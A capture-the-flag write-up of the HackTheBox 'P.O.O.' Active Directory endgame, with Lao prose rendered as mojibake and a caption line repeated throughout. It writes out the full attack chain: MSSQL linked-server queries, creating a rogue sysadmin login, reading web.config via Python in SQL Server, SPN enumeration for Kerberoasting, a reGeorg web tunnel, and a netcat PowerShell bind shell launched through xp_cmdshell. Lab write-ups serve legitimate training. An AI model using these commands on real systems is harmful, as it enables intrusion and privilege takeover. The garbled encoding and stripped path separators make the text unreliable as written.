เบˆเบธเบ”เปเบกเปˆเบ™เบงเปˆเบฒเป€เบกเบทเปˆเบญเบžเบงเบเป€เบฎเบปเบฒเป€เบฎเบฑเบ”เบเบฒเบ™เบฎเป‰เบญเบ‡เบ‚เปเบเบฑเบšเป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบ—เบตเปˆเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆ, เบเบฒเบ™เบฎเป‰เบญเบ‡เบ‚เปเบˆเบฐเบ–เบทเบเบ›เบฐเบ•เบดเบšเบฑเบ”เปƒเบ™เบชเบฐเบžเบฒเบšเบเบฒเบ™เบ‚เบญเบ‡เบœเบนเป‰เปƒเบŠเป‰เบญเบทเปˆเบ™! เปƒเบซเป‰เป€เบšเบดเปˆเบ‡เปƒเบ™เบชเบฐเบžเบฒเบšเบเบฒเบ™เบ‚เบญเบ‡เบœเบนเป‰เปƒเบŠเป‰เบ—เบตเปˆเบžเบงเบเป€เบฎเบปเบฒเบเปเบฒเบฅเบฑเบ‡เป€เบฎเบฑเบ”เบงเบฝเบเบขเบนเปˆเปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบ—เบตเปˆเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆ.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ•เบญเบ™เบ™เบตเป‰เปƒเบซเป‰เป€เบšเบดเปˆเบ‡เปƒเบ™เบชเบฐเบžเบฒเบšเบเบฒเบ™เปƒเบ”เบ—เบตเปˆเบ„เปเบฒเบฎเป‰เบญเบ‡เบ‚เปเบ–เบทเบเป€เบฎเบฑเบ”เบˆเบฒเบเป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบ—เบตเปˆเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบเบฑเบšเบžเบงเบเป€เบฎเบปเบฒ!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™เบกเบฑเบ™เปเบกเปˆเบ™เบชเบฐเบžเบฒเบšเบเบฒเบ™ DBO เบ—เบตเปˆเบ„เบงเบ™เบˆเบฐเบกเบตเบชเบดเบ”เบ—เบดเบžเบดเป€เบชเบ”เบ—เบฑเบ‡เบซเบกเบปเบ”. เปƒเบซเป‰เบเบงเบ”เป€เบšเบดเปˆเบ‡เบชเบดเบ”เบ—เบดเบžเบดเป€เบชเบ”เปƒเบ™เบเปเบฅเบฐเบ™เบตเบ‚เบญเบ‡เบเบฒเบ™เบฎเป‰เบญเบ‡เบ‚เปเบˆเบฒเบเป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบ—เบตเปˆเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆ.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ”เบฑเปˆเบ‡เบ—เบตเปˆเป€เบˆเบปเป‰เบฒเบชเบฒเบกเบฒเบ”เป€เบซเบฑเบ™เป„เบ”เป‰, เบžเบงเบเป€เบฎเบปเบฒเบกเบตเบชเบดเบ”เบ—เบดเบžเบดเป€เบชเบ”เบ—เบฑเบ‡เบซเบกเบปเบ”! เปƒเบซเป‰เบชเป‰เบฒเบ‡ admin เบ‚เบญเบ‡เบžเบงเบเป€เบฎเบปเบฒเป€เบญเบ‡เปเบšเบšเบ™เบตเป‰. เปเบ•เปˆเบžเบงเบเป€เบ‚เบปเบฒเบšเปเปˆเบญเบฐเบ™เบธเบเบฒเบ”เปƒเบซเป‰เบกเบฑเบ™เบœเปˆเบฒเบ™ openquery, เปƒเบซเป‰เป€เบฎเบฑเบ”เบกเบฑเบ™เบœเปˆเบฒเบ™ EXECUTE AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

เปเบฅเบฐเปƒเบ™เบ›เบฑเบ”เบˆเบธเบšเบฑเบ™เบžเบงเบเป€เบฎเบปเบฒเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบเบฑเบšเบ‚เปเป‰เบกเบนเบ™เบ›เบฐเบˆเปเบฒเบ•เบปเบงเบ‚เบญเบ‡เบœเบนเป‰เปƒเบŠเป‰เปƒเบซเบกเปˆ, เบžเบงเบเป€เบฎเบปเบฒเบชเบฑเบ‡เป€เบเบ”เป€เบซเบฑเบ™เบ–เบฒเบ™เบ‚เปเป‰เบกเบนเบ™เบ—เบธเบ‡เปƒเบซเบกเปˆ.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบžเบงเบเป€เบฎเบปเบฒเบกเบญเบšเบ—เบธเบ‡เบ™เบตเป‰เปเบฅเบฐเบเป‰เบฒเบงเบ•เปเปˆเป„เบ›.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ—เบธเบ‡ BackTrack

เปƒเบซเป‰เป€เบญเบปเบฒเปเบเบฐเป‚เบ”เบเปƒเบŠเป‰ MSSQL, เบ‚เป‰เบญเบเปƒเบŠเป‰ mssqlclient เบˆเบฒเบเบŠเบธเบ” impacket.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบžเบงเบเป€เบฎเบปเบฒเบˆเปเบฒเป€เบ›เบฑเบ™เบ•เป‰เบญเบ‡เป„เบ”เป‰เบฎเบฑเบšเบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™, เปเบฅเบฐเบชเบดเปˆเบ‡เบ—เปเบฒเบญเบดเบ”เบ—เบตเปˆเบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เบžเบปเบšเปเบฅเป‰เบงเปเบกเปˆเบ™เป€เบงเบฑเบšเป„เบŠเบ—เปŒ. เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™, เบžเบงเบเป€เบฎเบปเบฒเบ•เป‰เบญเบ‡เบเบฒเบ™ config เป€เบŠเบตเบŸเป€เบงเบตเป€เบงเบฑเบš (เบกเบฑเบ™เป€เบ›เบฑเบ™เป„เบ›เบšเปเปˆเป„เบ”เป‰เบ—เบตเปˆเบˆเบฐเบญเบญเบเบˆเบฒเบเปเบเบฐเบ—เบตเปˆเบชเบฐเบ”เบงเบเบชเบฐเบšเบฒเบ, เป€เบšเบดเปˆเบ‡เบ„เบทเบงเปˆเบฒเป„เบŸเบงเปเบเปเบฒเบฅเบฑเบ‡เปเบฅเปˆเบ™เบขเบนเปˆ).

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบ•เปˆเบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เบ–เบทเบเบ›เบฐเบ•เบดเป€เบชเบ”. เป€เบ–เบดเบ‡เปเบกเปˆเบ™เบงเปˆเบฒเบžเบงเบเป€เบฎเบปเบฒเบชเบฒเบกเบฒเบ”เบญเปˆเบฒเบ™เป„เบŸเบฅเปŒเบˆเบฒเบ MSSQL, เบžเบงเบเป€เบฎเบปเบฒเบžเบฝเบ‡เปเบ•เปˆเบ•เป‰เบญเบ‡เบเบฒเบ™เบฎเบนเป‰เบงเปˆเบฒเบžเบฒเบชเบฒเบเบฒเบ™เบ‚เบฝเบ™เป‚เบ›เบผเปเบเบผเบกเปƒเบ”เบ–เบทเบเบ•เบฑเป‰เบ‡เบ„เปˆเบฒ. เปเบฅเบฐเปƒเบ™เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบต MSSQL เบžเบงเบเป€เบฎเบปเบฒเบžเบปเบšเบงเปˆเบฒเบกเบต Python.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™, เบšเปเปˆเบกเบตเบšเบฑเบ™เบซเบฒเปƒเบ™เบเบฒเบ™เบญเปˆเบฒเบ™เป„เบŸเบฅเปŒ web.config.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ”เป‰เบงเบเบ‚เปเป‰เบกเบนเบ™เบ›เบฐเบˆเปเบฒเบ•เบปเบงเบ—เบตเปˆเบžเบปเบšเป€เบซเบฑเบ™, เป„เบ›เบซเบฒ /admin เปเบฅเบฐเป€เบญเบปเบฒเบ—เบธเบ‡.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ—เบธเบ‡เบŠเบฒเบ”

เปƒเบ™เบ„เบงเบฒเบกเป€เบ›เบฑเบ™เบˆเบดเบ‡, เบกเบตเบ„เบงเบฒเบกเบšเปเปˆเบชเบฐเบ”เบงเบเบšเบฒเบ‡เบขเปˆเบฒเบ‡เบˆเบฒเบเบเบฒเบ™เปƒเบŠเป‰เป„เบŸเบงเป, เปเบ•เปˆเป€เบšเบดเปˆเบ‡เบœเปˆเบฒเบ™เบเบฒเบ™เบ•เบฑเป‰เบ‡เบ„เปˆเบฒเป€เบ„เบทเบญเบ‚เปˆเบฒเบ, เบžเบงเบเป€เบฎเบปเบฒเบชเบฑเบ‡เป€เบเบ”เป€เบซเบฑเบ™เบงเปˆเบฒ IPv6 เบเบฑเบ‡เบ–เบทเบเบ™เปเบฒเปƒเบŠเป‰!

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปƒเบซเป‰เป€เบžเบตเปˆเบกเบ—เบตเปˆเบขเบนเปˆเบ™เบตเป‰เปƒเบชเปˆ /etc/hosts.
dead:babe::1001 poo6.htb
เปƒเบซเป‰เบชเบฐเปเบเบ™เป€เบˆเบปเป‰เบฒเบžเบฒเบšเบญเบตเบเบ„เบฑเป‰เบ‡, เปเบ•เปˆเปƒเบŠเป‰ IPv6 protocol.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบฅเบฐเบเบฒเบ™เบšเปเบฅเบดเบเบฒเบ™ WinRM เปเบกเปˆเบ™เบกเบตเบขเบนเปˆเปƒเบ™เป„เบฅเบเบฐ IPv6. เปƒเบซเป‰เป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบเบฑเบšเบ‚เปเป‰เบกเบนเบ™เบ›เบฐเบˆเปเบฒเบ•เบปเบงเบ—เบตเปˆเบžเบปเบšเป€เบซเบฑเบ™.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบกเบตเบ—เบธเบ‡เบขเบนเปˆเปƒเบ™ desktop, เบžเบงเบเป€เบฎเบปเบฒเป€เบญเบปเบฒเบกเบฑเบ™เป„เบ›.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

P00ned เบ—เบธเบ‡

เบซเบผเบฑเบ‡เบˆเบฒเบเบ”เปเบฒเป€เบ™เบตเบ™เบเบฒเบ™ reconnaissance เบเปˆเบฝเบงเบเบฑเบšเป€เบˆเบปเป‰เบฒเบžเบฒเบšเบเบฒเบ™เบ™เปเบฒเปƒเบŠเป‰ เปเบฒเบเบ–เบปเปˆเบง เบžเบงเบเป€เบฎเบปเบฒเบšเปเปˆเบžเบปเบšเบซเบเบฑเบ‡เบžเบดเป€เบชเบ”. เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™, เบกเบฑเบ™เป„เบ”เป‰เบ–เบทเบเบ•เบฑเบ”เบชเบดเบ™เปƒเบˆเบ—เบตเปˆเบˆเบฐเบŠเบญเบเบซเบฒเบ‚เปเป‰เบกเบนเบ™เบ›เบฐเบˆเปเบฒเบ•เบปเบงเบญเบตเบเป€เบ—เบทเปˆเบญเบซเบ™เบถเปˆเบ‡ (เบ‚เป‰เบฒเบžเบฐเป€เบˆเบปเป‰เบฒเบเบฑเบ‡เป„เบ”เป‰เบ‚เบฝเบ™เบเปˆเบฝเบงเบเบฑเบšเบซเบปเบงเบ‚เปเป‰เบ™เบตเป‰ เบšเบปเบ”เบ„เบงเบฒเบก). เปเบ•เปˆเบ‚เป‰เบญเบเบšเปเปˆเบชเบฒเบกเบฒเบ”เป„เบ”เป‰เบฎเบฑเบš SPNs เบ—เบฑเบ‡เบซเบกเบปเบ”เบˆเบฒเบเบฅเบฐเบšเบปเบšเบœเปˆเบฒเบ™ WinRM.

setspn.exe -T intranet.poo -Q */*

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปƒเบซเป‰เบ”เปเบฒเป€เบ™เบตเบ™เบเบฒเบ™เบ„เปเบฒเบชเบฑเปˆเบ‡เบœเปˆเบฒเบ™ MSSQL.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบเบฒเบ™เบ™เปเบฒเปƒเบŠเป‰เบงเบดเบ—เบตเบเบฒเบ™เบ™เบตเป‰, เบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เบฎเบฑเบš SPN เบ‚เบญเบ‡เบœเบนเป‰เปƒเบŠเป‰ p00_hr เปเบฅเบฐ p00_adm, เบŠเบถเปˆเบ‡เบซเบกเบฒเบเบ„เบงเบฒเบกเบงเปˆเบฒเบžเบงเบเป€เบ‚เบปเบฒเบกเบตเบ„เบงเบฒเบกเบชเปˆเบฝเบ‡เบ•เปเปˆเบเบฒเบ™เป‚เบˆเบกเบ•เบตเป€เบŠเบฑเปˆเบ™ Kerberoasting. เปƒเบ™เบชเบฑเป‰เบ™, เบžเบงเบเป€เบฎเบปเบฒเบชเบฒเบกเบฒเบ”เป„เบ”เป‰เบฎเบฑเบš hashes เบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เบ‚เบญเบ‡เป€เบ‚เบปเบฒเป€เบˆเบปเป‰เบฒ.

เบ—เปเบฒเบญเบดเบ”เบ—เปˆเบฒเบ™เบˆเปเบฒเป€เบ›เบฑเบ™เบ•เป‰เบญเบ‡เป„เบ”เป‰เบฎเบฑเบšเปเบเบฐเบ—เบตเปˆเบซเบกเบฑเป‰เบ™เบ„เบปเบ‡เป€เบ›เบฑเบ™เบœเบนเป‰เปƒเบŠเป‰ MSSQL. เปเบ•เปˆเป€เบ™เบทเปˆเบญเบ‡เบˆเบฒเบเบžเบงเบเป€เบฎเบปเบฒเบ–เบทเบเบˆเปเบฒเบเบฑเบ”เปƒเบ™เบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡, เบžเบงเบเป€เบฎเบปเบฒเบกเบตเบเบฒเบ™เป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบเบฑเบšเป€เบˆเบปเป‰เบฒเบžเบฒเบšเบžเบฝเบ‡เปเบ•เปˆเบœเปˆเบฒเบ™เบžเบญเบ” 80 เปเบฅเบฐ 1433. เปเบ•เปˆเบกเบฑเบ™เป€เบ›เบฑเบ™เป„เบ›เป„เบ”เป‰ tunnel traffic เบœเปˆเบฒเบ™ port 80! เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบ™เบตเป‰เบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเปƒเบŠเป‰ เบ„เปเบฒเบฎเป‰เบญเบ‡เบชเบฐเบซเบกเบฑเบเบ•เปเปˆเป„เบ›. เปƒเบซเป‰เบžเบงเบเป€เบฎเบปเบฒเบญเบฑเบšเป‚เบซเบฅเบ”เป„เบŸเบฅเปŒ tunnel.aspx เป„เบ›เบซเบฒเป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบตเบซเบ™เป‰เบฒเบ—เปเบฒเบญเบดเบ”เบ‚เบญเบ‡เป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเป€เบงเบฑเบšเป„เบŠเบ•เปŒ - C:inetpubwwwroot .

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบ•เปˆเป€เบกเบทเปˆเบญเบžเบงเบเป€เบฎเบปเบฒเบžเบฐเบเบฒเบเบฒเบกเป€เบ‚เบปเป‰เบฒเบซเบฒเบกเบฑเบ™, เบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เบฎเบฑเบšเบ‚เปเป‰เบœเบดเบ”เบžเบฒเบ” 404. เบ™เบตเป‰เบซเบกเบฒเบเบ„เบงเบฒเบกเบงเปˆเบฒเป„เบŸเบฅเปŒ *.aspx เบšเปเปˆเป„เบ”เป‰เบ–เบทเบเบ›เบฐเบ•เบดเบšเบฑเบ”. เป€เบžเบทเปˆเบญเปƒเบซเป‰เป„เบŸเบฅเปŒเบ—เบตเปˆเบกเบตเบชเปˆเบงเบ™เบ‚เบฐเบซเบเบฒเบเป€เบซเบผเบปเปˆเบฒเบ™เบตเป‰เบ–เบทเบเบ›เบฐเบ•เบดเบšเบฑเบ”, เบ•เบดเบ”เบ•เบฑเป‰เบ‡ ASP.NET 4.5 เบ”เบฑเปˆเบ‡เบ•เปเปˆเป„เบ›เบ™เบตเป‰.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบฅเบฐเปƒเบ™เบ›เบฑเบ”เบˆเบธเบšเบฑเบ™, เป€เบกเบทเปˆเบญเบžเบงเบเป€เบฎเบปเบฒเป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡ tunnel.aspx, เบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เบฎเบฑเบšเบเบฒเบ™เบ•เบญเบšเบชเบฐเบซเบ™เบญเบ‡เบงเปˆเบฒเบ—เบธเบเบชเบดเปˆเบ‡เบ—เบธเบเบขเปˆเบฒเบ‡เปเบกเปˆเบ™เบžเป‰เบญเบกเบ—เบตเปˆเบˆเบฐเป„เบ›.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปƒเบซเป‰เป€เบ›เบตเบ”เบชเปˆเบงเบ™เบฅเบนเบเบ„เป‰เบฒเบ‚เบญเบ‡เปเบญเบฑเบšเบžเบฅเบดเป€เบ„เบŠเบฑเบ™, เป€เบŠเบดเปˆเบ‡เบˆเบฐเบชเบปเปˆเบ‡เบเบฒเบ™เบˆเบฐเบฅเบฒเบˆเบญเบ™. เบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเบชเบปเปˆเบ‡เบ•เปเปˆเบเบฒเบ™เบˆเบฐเบฅเบฒเบˆเบญเบ™เบ—เบฑเบ‡เบซเบกเบปเบ”เบˆเบฒเบเบžเบญเบ” 5432 เป„เบ›เบซเบฒเป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบ.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบฅเบฐเบžเบงเบเป€เบฎเบปเบฒเปƒเบŠเป‰ proxychains เป€เบžเบทเปˆเบญเบชเบปเปˆเบ‡เบเบฒเบ™เบˆเบฐเบฅเบฒเบˆเบญเบ™เบ‚เบญเบ‡เปเบญเบฑเบšเบžเบฅเบดเป€เบ„เบŠเบฑเบ™เปƒเบ”เป†เป‚เบ”เบเบœเปˆเบฒเบ™เบ•เบปเบงเปเบ—เบ™เบ‚เบญเบ‡เบžเบงเบเป€เบฎเบปเบฒ. เปƒเบซเป‰เป€เบžเบตเปˆเบกเบžเบฃเบฑเบญเบเบŠเบตเบ™เบตเป‰เปƒเบชเปˆเป„เบŸเบฅเปŒเบเบฒเบ™เบ•เบฑเป‰เบ‡เบ„เปˆเบฒ /etc/proxychains.conf.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ•เบญเบ™เบ™เบตเป‰เปƒเบซเป‰เป€เบฎเบปเบฒเบญเบฑเบšเป‚เบซเบฅเบ”เป‚เบ›เบฃเปเบเบฃเบกเปƒเบชเปˆเป€เบŠเบตเบšเป€เบงเบต netcat, เบ—เบตเปˆเบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเป€เบฎเบฑเบ”เป€เบ›เบทเบญเบเบซเบธเป‰เบกเบ™เบญเบเบœเบนเบเบกเบฑเบ”เบ—เบตเปˆเบซเบกเบฑเป‰เบ™เบ„เบปเบ‡เปเบฅเบฐ script เบฎเบฝเบเบฎเป‰เบญเบ‡-Kerberoast, เบ—เบตเปˆเบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เป‚เบˆเบกเบ•เบต Kerberoasting.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ•เบญเบ™เบ™เบตเป‰เบžเบงเบเป€เบฎเบปเบฒเป€เบ›เบตเบ”เบ•เบปเบงเบœเบนเป‰เบŸเบฑเบ‡เบœเปˆเบฒเบ™ MSSQL.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบฅเบฐเบžเบงเบเป€เบฎเบปเบฒเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบœเปˆเบฒเบ™เบ•เบปเบงเปเบ—เบ™เบ‚เบญเบ‡เบžเบงเบเป€เบฎเบปเบฒ.

proxychains rlwrap nc poo.htb 4321

